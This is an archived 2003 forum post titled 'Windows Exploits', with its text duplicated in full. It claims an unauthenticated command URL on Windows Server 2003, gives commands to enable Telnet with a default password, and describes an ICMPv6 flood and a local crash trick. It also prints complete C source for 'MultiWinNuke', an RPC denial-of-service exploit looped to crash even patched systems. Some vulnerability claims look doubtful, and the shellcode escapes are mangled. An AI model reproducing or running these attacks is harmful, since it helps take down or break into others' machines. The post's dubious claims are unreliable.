Windows Exploits
Posted: Sun Jun 08, 2003 8:57 pm
Now, this is the security bugsvulnerabilities.
**********
The first one is two Windows Server 2003 security vulnerabilities
1. Windows 2003 Server has a built in Command Line Interreptor (I don't
know if this service is enabled by defult but i've tested this on 9
systems,
in 7 of them it worked), which means that you can send commands to it using
the HTTP (TCP)
method (the web browser) by trying to access the server on port 19338
like this:
[url=http://admin@<ip>:19338/cmd.cgi?cmd=<EnterCommandHere>]http://admin@<ip>:19338/cmd.cgi?cmd=...CommandHere>[/url]
That will cause the server to run the command from the $ROOT$ drive.
Which may be either C/D/E or any other drive defined by the owner / admin
of the machine.
Note that no username or password are requierd.
2. Windows 2003 Server has a built in Telnet service (disabled by defult)
that listens to open connections on port 3382.
An attacker can exploit the first vulnerability (#1 above) and write this
commands there -
"sc config TlntSvr start= auto"
and them:
"net start TlntSvr"
then the attacker has FULL access to the system.
Only a password is requierd, and becouse i've just enabled this service,
the password is also set to defult -
Password: tlntadmn
Note that if this sevice is already enabled, the password wil be wrong
(only if the system admin changed it)
If that service is already enabled with aa other password, the attacker can
open a sharing service or any other service that can give him easy
access tot he system.
**********
The secound one is Windows NT (2000XP2003) ICMPv6 Flooding
This little Denial of Service attack works jst like ICMP flood but it uses
Ping6 tool (in IPv6 enabled Windows OS or an IPv6 enabled *nix OS)
This attack is also good becouse Microsoft's Internet Connection Firewall
is unable to block IPv6 traffic.
This is maybe a slow attack but effective, it is also depends on the
attacker and victim's bandwidth.
An exploit for this can be easly made, and i am working on one.
**********
This bug will make Windows XP (all editions) to crash.
Creat 122 folders one inside the other and naming them by one char' (like
'1' or '0'). now go to one before the last dir' and right click the last
folder. hover the mouse over the poped manu and the system will crash.
Stupid one but it does crash the system.
**********
This is an upgraded exploit witch will DoS and crash a remote machine using
the WinNuke.c exploit that exploits - Microsoft Windows RPC Service Denial
of Service Vulnerability
I've discoverd that you can STILL DoS and crash it even if it's patched
(with an offical M$ patch) aginst it, by simply nuking it a lot of times,
and fast.
this is the exploit (MultiWinNuke.c a.k.a FixedWinNuke.c)
### Start MultiWinNuke.c ###
/*
* Microsoft Windows NT RPC Service Denial of Service Vulnerability
*
* Orginal Code By Lion @ http://www.cnhonker.com
* Upgraded By Trancer @ http://BinaryVision.tech.nu
*
* I have notice that even after a Windows NT system is patched aginst this
vulnerability with an offical M$ update,
* an attacker can still DoS that system if he activate this exploit a lot
of times, fast.
* So I've upgraded the exploit by looping it and letting you control the
times you want to nuke a system
* (with a patched 2000XP 250-400 times is recommended).
*
* That's it. enjoy
*
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char sendcode1[] =
" x05x00x0bx03x10x00x00x00x48x00x00x00x
02x00x00x00"
" xd0x16xd0x16x00x00x00x00x01x00x00x00x
00x00x01x00"
" x60x9exe7xb9x52x3dxcex11xaaxa1x00x00x
69x01x29x3f"
" x02x00x02x00x04x5dx88x8axebx1cxc9x11x
9fxe8x08x00"
" x2bx10x48x60x02x00x00x00x05x00x00x01x
10x00x00x00"
" xd0x16x00x00x8fx00x00x00x20x27x01x00x
00x00x02x00"
"xf0x00x00x00x00x00x00x00xf0x00x00x00";
char sendcode2[] =
"x88x13x00x00x00x00x00x00x88x13x00x00";
char sendcode3[] =
" xffxffxffxffxffxffxffxffx00x00x00x00x
00x00x00x00"
" x00x00x00x00x00x02x00x00x00x00x00x00x
00x02x00x00";
char sendcode4[] =
" xfexffx00x00x00x00x00x00xfexffx00x00x
3dx3dx3dx3d"
" x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx
3dx3dx3dx3d"
" x05x00x00x00x10x00x00x00xd0x16x00x00x
8fx00x00x00"
"x50x10x01x00x00x00x02x00";
char sendcode5[] =
" x05x00x00x00x10x00x00x00xd0x16x00x00x
8fx00x00x00"
"x80xf9x00x00x00x00x02x00";
char sendcode6[] =
" x05x00x00x00x10x00x00x00xd0x16x00x00x
8fx00x00x00"
"xb0xe2x00x00x00x00x02x00";
char sendcode7[] =
" x05x00x00x02x10x00x00x00x60x15x00x00x
8fx00x00x00"
"x60x15x00x00x00x00x02x00";
char sendcode8[] =
" x00x00x01x10x00x00x00x00x00x00x01x10x
00x00";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize,times,i;
SOCKET s;
char buffer[20480];
printf("======================= Windows NT Multi RPC Nuke V0.12
======================
");
printf("=============== Orginal Code By Lion @ http://www.cnhonker.com
===============
");
printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu
==============
");
if (argc < 2)
{
printf("Usage:
");
printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>
", argv[0]);
printf("Exaple: %s 198.167.0.1 135 512 250
", argv[0]);
printf("PS:
");
printf(" If target is XP, try 2 times.
");
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
targetip = argv[1];
port = 135;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
times = 1;
if (argc >= 5) times = atoi(argv[4]);
for (i = 0; i < times; i = i + 1)
{
s = socket(AF_INET, SOCK_STREAM, 0);
if(s==INVALID_SOCKET)
{
printf("Socket error!
");
exit(1);
}
printf("Resolving Hostnames...
");
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("Resolve of %s failed, please try again.
", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...
");
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.
");
exit(1);
}
printf("Connected!...
");
printf("Sending Packets...
");
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
{
printf("Error sending nuke Packets
");
closesocket(s);
exit(1);
}
memset(&buffer, 'x41', 240);
send(s, buffer, 240, 0);
send(s, sendcode2, sizeof(sendcode2)-1, 0);
memset(&buffer, 'x42', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode3, sizeof(sendcode3)-1, 0);
memset(&buffer, 'x43', 512);
send(s, buffer, 512, 0);
send(s, sendcode4, sizeof(sendcode4)-1, 0);
memset(&buffer, 'x44', 20480);
send(s, buffer, 20480, 0);
memset(&buffer, 'x44', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode5, sizeof(sendcode5)-1, 0);
memset(&buffer, 'x45', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode6, sizeof(sendcode6)-1, 0);
memset(&buffer, 'x46', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode7, sizeof(sendcode7)-1, 0);
memset(&buffer, 'x47', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode8, sizeof(sendcode8)-1, 0);
memset(&buffer, 'x48', 5000);
send(s, buffer, 5000, 0);
i = i + 1;
}
if (times < 2)
{
printf("Nuked! If target is XP, try a again!
");
}
else
{
printf("%s was nuked %s times
", argv[1], argv[4]);
}
closesocket(s);
WSACleanup();
return 0;
}
### End MultiWinNuke.c ###
Oh, and don't give me credit for this, it's someone else that found these at one digital hangout (found in our top sites).
Archived topic from Iceteks, old topic ID:845, old post ID:7340
**********
The first one is two Windows Server 2003 security vulnerabilities
1. Windows 2003 Server has a built in Command Line Interreptor (I don't
know if this service is enabled by defult but i've tested this on 9
systems,
in 7 of them it worked), which means that you can send commands to it using
the HTTP (TCP)
method (the web browser) by trying to access the server on port 19338
like this:
[url=http://admin@<ip>:19338/cmd.cgi?cmd=<EnterCommandHere>]http://admin@<ip>:19338/cmd.cgi?cmd=...CommandHere>[/url]
That will cause the server to run the command from the $ROOT$ drive.
Which may be either C/D/E or any other drive defined by the owner / admin
of the machine.
Note that no username or password are requierd.
2. Windows 2003 Server has a built in Telnet service (disabled by defult)
that listens to open connections on port 3382.
An attacker can exploit the first vulnerability (#1 above) and write this
commands there -
"sc config TlntSvr start= auto"
and them:
"net start TlntSvr"
then the attacker has FULL access to the system.
Only a password is requierd, and becouse i've just enabled this service,
the password is also set to defult -
Password: tlntadmn
Note that if this sevice is already enabled, the password wil be wrong
(only if the system admin changed it)
If that service is already enabled with aa other password, the attacker can
open a sharing service or any other service that can give him easy
access tot he system.
**********
The secound one is Windows NT (2000XP2003) ICMPv6 Flooding
This little Denial of Service attack works jst like ICMP flood but it uses
Ping6 tool (in IPv6 enabled Windows OS or an IPv6 enabled *nix OS)
This attack is also good becouse Microsoft's Internet Connection Firewall
is unable to block IPv6 traffic.
This is maybe a slow attack but effective, it is also depends on the
attacker and victim's bandwidth.
An exploit for this can be easly made, and i am working on one.
**********
This bug will make Windows XP (all editions) to crash.
Creat 122 folders one inside the other and naming them by one char' (like
'1' or '0'). now go to one before the last dir' and right click the last
folder. hover the mouse over the poped manu and the system will crash.
Stupid one but it does crash the system.
**********
This is an upgraded exploit witch will DoS and crash a remote machine using
the WinNuke.c exploit that exploits - Microsoft Windows RPC Service Denial
of Service Vulnerability
I've discoverd that you can STILL DoS and crash it even if it's patched
(with an offical M$ patch) aginst it, by simply nuking it a lot of times,
and fast.
this is the exploit (MultiWinNuke.c a.k.a FixedWinNuke.c)
### Start MultiWinNuke.c ###
/*
* Microsoft Windows NT RPC Service Denial of Service Vulnerability
*
* Orginal Code By Lion @ http://www.cnhonker.com
* Upgraded By Trancer @ http://BinaryVision.tech.nu
*
* I have notice that even after a Windows NT system is patched aginst this
vulnerability with an offical M$ update,
* an attacker can still DoS that system if he activate this exploit a lot
of times, fast.
* So I've upgraded the exploit by looping it and letting you control the
times you want to nuke a system
* (with a patched 2000XP 250-400 times is recommended).
*
* That's it. enjoy
*
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char sendcode1[] =
" x05x00x0bx03x10x00x00x00x48x00x00x00x
02x00x00x00"
" xd0x16xd0x16x00x00x00x00x01x00x00x00x
00x00x01x00"
" x60x9exe7xb9x52x3dxcex11xaaxa1x00x00x
69x01x29x3f"
" x02x00x02x00x04x5dx88x8axebx1cxc9x11x
9fxe8x08x00"
" x2bx10x48x60x02x00x00x00x05x00x00x01x
10x00x00x00"
" xd0x16x00x00x8fx00x00x00x20x27x01x00x
00x00x02x00"
"xf0x00x00x00x00x00x00x00xf0x00x00x00";
char sendcode2[] =
"x88x13x00x00x00x00x00x00x88x13x00x00";
char sendcode3[] =
" xffxffxffxffxffxffxffxffx00x00x00x00x
00x00x00x00"
" x00x00x00x00x00x02x00x00x00x00x00x00x
00x02x00x00";
char sendcode4[] =
" xfexffx00x00x00x00x00x00xfexffx00x00x
3dx3dx3dx3d"
" x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx
3dx3dx3dx3d"
" x05x00x00x00x10x00x00x00xd0x16x00x00x
8fx00x00x00"
"x50x10x01x00x00x00x02x00";
char sendcode5[] =
" x05x00x00x00x10x00x00x00xd0x16x00x00x
8fx00x00x00"
"x80xf9x00x00x00x00x02x00";
char sendcode6[] =
" x05x00x00x00x10x00x00x00xd0x16x00x00x
8fx00x00x00"
"xb0xe2x00x00x00x00x02x00";
char sendcode7[] =
" x05x00x00x02x10x00x00x00x60x15x00x00x
8fx00x00x00"
"x60x15x00x00x00x00x02x00";
char sendcode8[] =
" x00x00x01x10x00x00x00x00x00x00x01x10x
00x00";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize,times,i;
SOCKET s;
char buffer[20480];
printf("======================= Windows NT Multi RPC Nuke V0.12
======================
");
printf("=============== Orginal Code By Lion @ http://www.cnhonker.com
===============
");
printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu
==============
");
if (argc < 2)
{
printf("Usage:
");
printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>
", argv[0]);
printf("Exaple: %s 198.167.0.1 135 512 250
", argv[0]);
printf("PS:
");
printf(" If target is XP, try 2 times.
");
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
targetip = argv[1];
port = 135;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
times = 1;
if (argc >= 5) times = atoi(argv[4]);
for (i = 0; i < times; i = i + 1)
{
s = socket(AF_INET, SOCK_STREAM, 0);
if(s==INVALID_SOCKET)
{
printf("Socket error!
");
exit(1);
}
printf("Resolving Hostnames...
");
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("Resolve of %s failed, please try again.
", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...
");
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.
");
exit(1);
}
printf("Connected!...
");
printf("Sending Packets...
");
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
{
printf("Error sending nuke Packets
");
closesocket(s);
exit(1);
}
memset(&buffer, 'x41', 240);
send(s, buffer, 240, 0);
send(s, sendcode2, sizeof(sendcode2)-1, 0);
memset(&buffer, 'x42', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode3, sizeof(sendcode3)-1, 0);
memset(&buffer, 'x43', 512);
send(s, buffer, 512, 0);
send(s, sendcode4, sizeof(sendcode4)-1, 0);
memset(&buffer, 'x44', 20480);
send(s, buffer, 20480, 0);
memset(&buffer, 'x44', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode5, sizeof(sendcode5)-1, 0);
memset(&buffer, 'x45', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode6, sizeof(sendcode6)-1, 0);
memset(&buffer, 'x46', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode7, sizeof(sendcode7)-1, 0);
memset(&buffer, 'x47', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode8, sizeof(sendcode8)-1, 0);
memset(&buffer, 'x48', 5000);
send(s, buffer, 5000, 0);
i = i + 1;
}
if (times < 2)
{
printf("Nuked! If target is XP, try a again!
");
}
else
{
printf("%s was nuked %s times
", argv[1], argv[4]);
}
closesocket(s);
WSACleanup();
return 0;
}
### End MultiWinNuke.c ###
Oh, and don't give me credit for this, it's someone else that found these at one digital hangout (found in our top sites).
Archived topic from Iceteks, old topic ID:845, old post ID:7340